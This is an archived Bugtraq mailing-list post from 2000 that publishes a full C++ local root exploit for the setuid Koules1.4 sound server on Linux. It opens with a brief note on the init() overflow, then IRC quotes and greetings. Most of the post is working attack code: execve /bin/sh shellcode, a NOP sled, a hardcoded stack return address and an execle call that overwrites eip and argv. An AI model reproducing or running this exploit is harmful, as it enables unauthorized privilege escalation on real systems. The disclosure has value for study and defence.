5753374 2000-11-20 09:10 +0100 /147 rader/ Guido Bakker <guidob@MAINNET.NL>
Importerad: 2000-11-20 19:22 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: guidob@mainnet.nl
Mottagare: Bugtraq (import) <13807>
Ärende: local exploit for linux's Koules1.4 package
------------------------------------------------------------
From: Guido Bakker <guidob@MAINNET.NL>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <00112009101300.24798@guidob>
/*
Coolz.cpp - yep a C Plus Plus exploit, I like that Strings STL :)
This problem has been known since April this year, but I have not
seen any exploit so far.
First of all I wasn't planning to go and release another ordinary
stack smash, but I found the setuid game on some wargame/hackme I
played on. Funny thing was that the exploitability proved to be a
bit harder than I had anticipated at first.
The problem can be found in the Koules1.4 package, code file:
koules.sndsrv.linux.c - function: init()
The `int i` disappears in the optimization gcc does. Since the
strcat() function concatenates an array of filenames, `argv` gets
ruined. This will cause the first run of the loop to fail. If
argv point somewhere into adressable memory space, the chances of
having a second pointer in there are close to zero, thus the
second loop will fail. Last of all, if the argv[1] does point to
a valid address the string contained there shouldn't be long
enough to overwrite eip a second time, since that gets us into
trouble. That's about it :) Even then, this ONLY works on machines
that have compiled SVGALIB support in and NOT on the X windows
version of 'koules'.
Requested IRC quotes:
<dagger02> ik heb jeuk aan me ballen.
<marshal-> waar ben jij nu mee bezig man
<sArGeAnt> nog een keer sukkel
<sArGeAnt> en je ken es lekker kijken hoe packetjes je modem binnen komen
<gmd-> sex ?
<orangehaw> Scrippie HOU JE MOND OF Ik PACkEt Je ? ;)
<silvio> chicks dig me when i place a bet, cause the mandelbrot sucks
compare to the julia set
<jimjones> 4 years ago there was no aol account i couldnt phish, now my
unix virii grow faster than the petry dish
<dugje> I've seen nasa.gov navy.mil compaq.com and microsoft.com, there
is only one goal left .. *.root-servers.net.
Love goes out to: Hester and Maja
Shouts go out to: Aad de Bruin, Karel Roos, L.G. Weert, Louis Maatman,
Richard Vriesde.
-- We always did feel the same, we just saw it from a
different point of view...
[Bob Dylan - Tangled up in Blue]
<Scrippie> vraag me af wat ze zullen doen bij klpd als ze dat lezen (:
<dugje> ghehe ... je een plaatsje hoger zetten op de priority list ..
-- Scrippie/ronald@grafix.nl
/*
/* Synnergy.net (c) 2000 */
#include <cstdio>
#include <string>
#include <cstdlib>
#include <unistd.h>
#define FILENAME "/usr/local/lib/koules/koules.sndsrv.linux"
#define NOP 'A'
#define NUMNOPS 500
#define RETADDY "\x90\xfe\xff\xbf"
/* Since we return in the cleared environment, we don't need to have a
return address we can influence by command line "offset" arguments */
string heavenlycode =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char *addytostr(unsigned char *);
using namespace std;
main()
{
string payload, vector;
unsigned int i;
const char *env[3];
const char *ptr_to_bffffffc;
/* Construction of our payload */
payload.append(NUMNOPS, NOP);
payload.append(heavenlycode);
env[0] = payload.c_str();
/* This memory address always contains 0x00000000 */
env[1] = "\xfc\xff\xff\xbf";
env[2] = NULL;
/* Calculate for yourself, and check out: linux/fs/exec.c */
ptr_to_bffffffc =
addytostr((unsigned char *)(0xc0000000-sizeof(void *)-sizeof(FILENAME)
-sizeof(heavenlycode)-sizeof(char
*)-1));
for(i=0;i<256;i++) {
vector.append(RETADDY); /* Fill the buffer */
}
/* We do NOT overwrite 'int i' - a register is used after gcc -O */
vector.append(RETADDY); /* Overwrites ebp */
vector.append(RETADDY); /* Overwrites eip */
vector.append(ptr_to_bffffffc); /* Overwrites argv argument */
execle(FILENAME, "Segmentation fault (core dumped)", vector.c_str(), "A",
NULL, env);
perror("execle()");
}
char *addytostr(unsigned char *blaat)
{
char *ret;
if(!(ret = (char *)malloc(sizeof(unsigned char *)+1))) {
perror("malloc()");
exit(EXIT_FAILURE);
}
memcpy(ret, &blaat, sizeof(unsigned char *));
ret[sizeof(unsigned char *)] = 0x00;
return(ret);
}
--
Met vriendelijke groet / Kind regards,
| Guido Bakker <guidob@mainnet.nl>
| Network Manager
MainNet BV, http://www.mainnet.nl
Phone: +31 (0)20 6133505
Fax: +31 (0)20 6135640
(5753374) --------------------------------(Ombruten)